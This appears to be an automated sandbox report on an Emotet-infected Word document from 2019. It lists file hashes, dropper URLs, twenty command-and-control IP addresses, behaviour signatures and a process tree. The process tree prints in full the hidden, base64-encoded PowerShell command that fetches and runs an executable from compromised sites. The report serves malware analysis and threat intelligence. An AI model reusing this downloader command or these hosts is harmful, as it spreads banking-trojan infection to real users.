Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    146s
  • resource
    win7v191014
  • submitted
    16-12-2019 12:57

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_7f6f469f6981d4a92806d0d3b706e258.47.doc

  • Sample

    191216-kj834shtp2

  • SHA256

    0dfb26cd2eb02c921a9c73c9c5615dfb666cdd33971639d6441eb6893ae2efe1

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://lilikhendarwati.com/wp-admin/JbdTQoQQ/
exe.dropper

http://www.zhangboo.com/wp-admin/lwhcvV/
exe.dropper

http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/
exe.dropper

https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/
exe.dropper

http://apolina.pl/engl/1tuh6ul-gakf89-994/

Extracted

Family

emotet

C2

190.38.252.45:443

105.225.77.21:80

181.167.35.84:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

69.30.205.162:7080

190.161.67.63:80

81.82.247.216:80

72.69.99.47:80

172.90.70.168:443

91.117.31.181:80

200.71.112.158:53

51.77.113.97:8080

190.101.87.170:80

96.234.38.186:8080

190.146.14.143:443

86.70.224.211:80

88.247.26.78:80

175.103.239.50:80
rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Modifies registry class 144 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7f6f469f6981d4a92806d0d3b706e258.47.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: AddClipboardFormatListener
    PID:1488
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:00000000000005D8;0000000000000654;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1276
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:00000000000005D8;0000000000000654;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2040
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABPAHEAbwBqAHIAcABtAGsAZAB6AGwAZwA9ACcARwBlAHUAcwBjAGsAZgBlAGkAcwBsAGgAJwA7ACQAUwBnAHkAbgBhAGQAdABkAHoAaQAgAD0AIAAnADIAMQA4ACcAOwAkAEYAcwBuAGMAagBmAGIAbgBvAHUAdgBjAHcAPQAnAFYAcgB0AGcAdwBvAGoAaABnAHIAcQBrACcAOwAkAEkAcwB2AGUAZgB0AHMAYwB5AG0AawBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAGcAeQBuAGEAZAB0AGQAegBpACsAJwAuAGUAeABlACcAOwAkAFkAawBqAHoAbQB4AGcAeQBlAGsAcABmAD0AJwBYAGgAaABpAHYAcAB4AHQAbgAnADsAJABQAGQAegB2AGUAdgBiAGgAZQBzAD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAEUAdAAuAFcAZQBiAGMATABpAEUAbgBUADsAJABNAHYAYwBiAGwAcgBoAGsAegBvAHoAZwA9ACcAaAB0AHQAcABzADoALwAvAGwAaQBsAGkAawBoAGUAbgBkAGEAcgB3AGEAdABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBKAGIAZABUAFEAbwBRAFEALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB6AGgAYQBuAGcAYgBvAG8ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGwAdwBoAGMAdgBWAC8AKgBoAHQAdABwADoALwAvAHQAZQBzAHQALgB3AGkAbgBkAHMAbwByAGgAZQBhAHQAaQBuAGcAYQBuAGQAYQBpAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHIAOQBsAHYALQA0AHQAZQBxADUAZgBmAC0AOAA3ADUAOQA4ADQANgAxADQAMAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AagBhAGMAawBpAGUAagBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AeQBpAHEAcgA0AHIANgBhAC0AZAB3AHQANwBzADAAdQAtADIANgA5ADYANQA4ADcAOAAvACoAaAB0AHQAcAA6AC8ALwBhAHAAbwBsAGkAbgBhAC4AcABsAC8AZQBuAGcAbAAvADEAdAB1AGgANgB1AGwALQBnAGEAawBmADgAOQAtADkAOQA0AC8AJwAuACIAcwBgAHAATABJAFQAIgAoACcAKgAnACkAOwAkAEoAdgBrAGgAawB0AHYAdABzAHEAagA9ACcASwBsAG0AdwBuAGkAcgByACcAOwBmAG8AcgBlAGEAYwBoACgAJABNAHoAbQBxAGIAegBqAHUAZwAgAGkAbgAgACQATQB2AGMAYgBsAHIAaABrAHoAbwB6AGcAKQB7AHQAcgB5AHsAJABQAGQAegB2AGUAdgBiAGgAZQBzAC4AIgBkAG8AYABXAG4AbABgAE8AQQBkAGYASQBMAEUAIgAoACQATQB6AG0AcQBiAHoAagB1AGcALAAgACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQA7ACQASwB5AGsAaABvAHMAeABlAD0AJwBKAGMAYwB2AHIAdQByAHQAbQB5ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQAuACIAbABFAG4AYABHAHQAaAAiACAALQBnAGUAIAAzADEANAA1ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGEAYABSAFQAIgAoACQASQBzAHYAZQBmAHQAcwBjAHkAbQBrAG8AKQA7ACQARAB5AGsAZABhAGcAZQBpAHkAawByAGEAaQA9ACcARwBhAHUAbABuAGEAdABoAGoAcQAnADsAYgByAGUAYQBrADsAJABSAHgAZgBhAHAAdwBjAGcAaQBlAHAAdwA9ACcAQwBsAHMAawB2AGkAdQBmAG0AbABkAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwByAGEAbQB1AG4AbgBrAHMAawBjAGUAPQAnAEQAYgBsAHgAbgB2AHkAaABwAHkAdgB4ACcA
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Users\Admin\218.exe
      "C:\Users\Admin\218.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Users\Admin\218.exe
        --fa4b85d7
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:2276
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1528219934-930572129-557549151-63610335584663788913041379101392070685-478866540"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1204
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1520
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1972
      • C:\Windows\SysWOW64\dispidfunc.exe
        "C:\Windows\SysWOW64\dispidfunc.exe"
        1⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2436
        • C:\Windows\SysWOW64\dispidfunc.exe
          --b47713
          2⤵
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious behavior: EnumeratesProcesses
          • Executes dropped EXE
          PID:2456

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1488-3-0x00000000092F0000-0x00000000092F4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1488-0-0x0000000006360000-0x0000000006364000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1488-2-0x000000000645B000-0x000000000645F000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1488-1-0x000000000645B000-0x000000000645F000-memory.dmp

        Filesize

        16KB

        Download

      • memory/2196-11-0x00000000002D0000-0x00000000002E7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2276-14-0x0000000000240000-0x0000000000257000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2276-15-0x0000000000400000-0x000000000047D000-memory.dmp

        Filesize

        500KB

        Download

      • memory/2436-17-0x0000000000300000-0x0000000000317000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2456-19-0x0000000000360000-0x0000000000377000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2456-20-0x0000000000400000-0x000000000047D000-memory.dmp

        Filesize

        500KB

        Download